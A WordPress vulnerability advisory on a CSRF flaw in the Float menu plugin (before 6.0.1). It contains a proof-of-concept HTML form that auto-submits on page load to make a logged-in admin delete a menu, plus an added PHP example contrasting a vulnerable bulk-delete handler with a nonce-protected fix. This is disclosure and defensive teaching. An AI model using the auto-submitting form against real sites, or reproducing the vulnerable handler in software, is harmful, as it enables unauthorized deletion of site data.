wpexploit | Erwan LR (WPScan) | WPEX-ID:C42FFA15-6EBE-4C70-9E51-B95BD05EA04D
History: Apr 11, 2024 - 12:00 a.m.

Float menu < 6.0.1 - Menu Deletion via CSRF

2024-04-11 00:00:00
Erwan LR (WPScan)
Tags: float menu, version 6.0.1, csrf, exploit, poc, april 25, 2024

AI Score: 6.8
Confidence: High
EPSS: 0
Percentile: 9.0%

Description: The plugin does not have a CSRF check in its bulk actions, which could allow attackers to make a logged-in admin delete an arbitrary menu via a CSRF attack.

Making a logged-in admin open a page containing the code below will make them delete the menu with ID 1:

<!-- Proof of concept from the advisory: the form is submitted automatically as soon as the page loads -->
<body onload="document.forms[0].submit()">
    <!-- Cross-origin POST to the plugin's bulk-action endpoint; the browser attaches the admin's session cookies -->
    <form action="https://example.com/wp-admin/admin.php?page=float-menu&action=delete-items&action2=delete-items" method="POST">
        <!-- ID of the menu that the bulk "delete-items" action will remove -->
        <input type="text" name="ID" value="1"/>
        <input type="submit" value="submit">
    </form>
</body>
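The root cause is a bulk-action handler that trusts any request arriving with a valid admin session. The following added example is not part of the advisory or of the Float menu plugin's code; it shows the vulnerable shape of such a handler next to a hardened version that ties the action to a WordPress nonce and a capability check (the function names, the `fm-bulk-delete` nonce action, the `fm_nonce` field and the `fm_delete_menus()` persistence helper are hypothetical).

```php
<?php
// Added illustration, not the plugin's own code. All fm_* names are hypothetical.

// Vulnerable shape: only the session cookie gates the action, so a forged
// cross-site POST (like the PoC above) is accepted as if the admin had sent it.
function fm_handle_bulk_delete_vulnerable() {
    if ( isset( $_REQUEST['action'] ) && 'delete-items' === $_REQUEST['action'] ) {
        $ids = array_map( 'absint', (array) $_REQUEST['ID'] );
        fm_delete_menus( $ids ); // hypothetical persistence helper
    }
}

// Hardened shape: the request must carry a nonce minted for this action,
// and the user must actually be authorized to perform it.
function fm_handle_bulk_delete_fixed() {
    if ( ! isset( $_REQUEST['action'] ) || 'delete-items' !== $_REQUEST['action'] ) {
        return;
    }
    // check_admin_referer() calls wp_die() unless $_REQUEST['fm_nonce'] holds a
    // valid nonce for 'fm-bulk-delete'. A third-party page cannot read the
    // token from the admin UI, so a forged POST fails here.
    check_admin_referer( 'fm-bulk-delete', 'fm_nonce' );

    // A nonce proves intent, not privilege: keep the capability check as well.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $ids = array_map( 'absint', (array) $_REQUEST['ID'] );
    fm_delete_menus( $ids );
}

// The legitimate admin form must embed the token the handler verifies.
function fm_render_bulk_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=float-menu' ) ) . '">';
    wp_nonce_field( 'fm-bulk-delete', 'fm_nonce' ); // hidden field + referer field
    echo '<input type="hidden" name="action" value="delete-items">';
    echo '<input type="checkbox" name="ID[]" value="1"> Menu 1<br>';
    submit_button( 'Delete selected' );
    echo '</form>';
}
```

Nonces are tied to the logged-in user and rotate over time, so the fixed handler rejects the advisory's PoC while the plugin's own form, rendered with wp_nonce_field(), keeps working.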

